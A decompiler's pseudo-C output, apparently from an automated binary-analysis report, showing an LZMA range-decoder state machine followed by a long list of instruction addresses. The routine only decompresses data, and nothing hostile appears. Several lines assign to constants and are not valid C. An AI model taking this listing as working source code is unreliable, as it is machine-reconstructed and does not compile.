														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                                                                            0x00000000
                                                                                                            0x004064ee
                                                                                                            0x004064ee
                                                                                                            0x004064f2
                                                                                                            0x004064ff
                                                                                                            0x00406509
                                                                                                            0x00000000
                                                                                                            0x004064f4
                                                                                                            0x004064f4
                                                                                                            0x0040652f
                                                                                                            0x00406532
                                                                                                            0x00406535
                                                                                                            0x00406538
                                                                                                            0x00406538
                                                                                                            0x0040653b
                                                                                                            0x00406542
                                                                                                            0x00406547
                                                                                                            0x00406428
                                                                                                            0x0040642b
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x004067a0
                                                                                                            0x004067a0
                                                                                                            0x004067a0
                                                                                                            0x004067a6
                                                                                                            0x004067ac
                                                                                                            0x004067b2
                                                                                                            0x004067cc
                                                                                                            0x004067cf
                                                                                                            0x004067d5
                                                                                                            0x004067e0
                                                                                                            0x004067e2
                                                                                                            0x004067b4
                                                                                                            0x004067b4
                                                                                                            0x004067c3
                                                                                                            0x004067c7
                                                                                                            0x004067c7
                                                                                                            0x004067ec
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004067ee
                                                                                                            0x004067f2
                                                                                                            0x004069a1
                                                                                                            0x004069b7
                                                                                                            0x004069bf
                                                                                                            0x004069c6
                                                                                                            0x004069c8
                                                                                                            0x004069cf
                                                                                                            0x004069d3
                                                                                                            0x004069d3
                                                                                                            0x004067fe
                                                                                                            0x00406805
                                                                                                            0x0040680d
                                                                                                            0x00406810
                                                                                                            0x00406813
                                                                                                            0x00406813
                                                                                                            0x00406819
                                                                                                            0x00406819
                                                                                                            0x00405fb5
                                                                                                            0x00405fb5
                                                                                                            0x00405fb5
                                                                                                            0x00405fbe
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fc4
                                                                                                            0x00000000
                                                                                                            0x00405fcf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fd8
                                                                                                            0x00405fdb
                                                                                                            0x00405fde
                                                                                                            0x00405fe2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fe8
                                                                                                            0x00405feb
                                                                                                            0x00405fed
                                                                                                            0x00405fee
                                                                                                            0x00405ff1
                                                                                                            0x00405ff3
                                                                                                            0x00405ff4
                                                                                                            0x00405ff6
                                                                                                            0x00405ff9
                                                                                                            0x00405ffe
                                                                                                            0x00406003
                                                                                                            0x0040600c
                                                                                                            0x0040601f
                                                                                                            0x00406022
                                                                                                            0x0040602e
                                                                                                            0x00406056
                                                                                                            0x00406058
                                                                                                            0x00406066
                                                                                                            0x00406066
                                                                                                            0x0040606a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040605a
                                                                                                            0x0040605a
                                                                                                            0x0040605d
                                                                                                            0x0040605e
                                                                                                            0x0040605e
                                                                                                            0x00000000
                                                                                                            0x0040605a
                                                                                                            0x00406034
                                                                                                            0x00406039
                                                                                                            0x00406039
                                                                                                            0x00406042
                                                                                                            0x0040604a
                                                                                                            0x0040604d
                                                                                                            0x00000000
                                                                                                            0x00406053
                                                                                                            0x00406053
                                                                                                            0x00000000
                                                                                                            0x00406053
                                                                                                            0x00000000
                                                                                                            0x00406070
                                                                                                            0x00406070
                                                                                                            0x00406074
                                                                                                            0x00406920
                                                                                                            0x00000000
                                                                                                            0x00406920
                                                                                                            0x0040607d
                                                                                                            0x0040608d
                                                                                                            0x00406090
                                                                                                            0x00406093
                                                                                                            0x00406093
                                                                                                            0x00406093
                                                                                                            0x00406096
                                                                                                            0x0040609a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040609c
                                                                                                            0x004060a2
                                                                                                            0x004060cc
                                                                                                            0x004060d2
                                                                                                            0x004060d9
                                                                                                            0x00000000
                                                                                                            0x004060d9
                                                                                                            0x004060a8
                                                                                                            0x004060ab
                                                                                                            0x004060b0
                                                                                                            0x004060b0
                                                                                                            0x004060bb
                                                                                                            0x004060c3
                                                                                                            0x004060c6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040610b
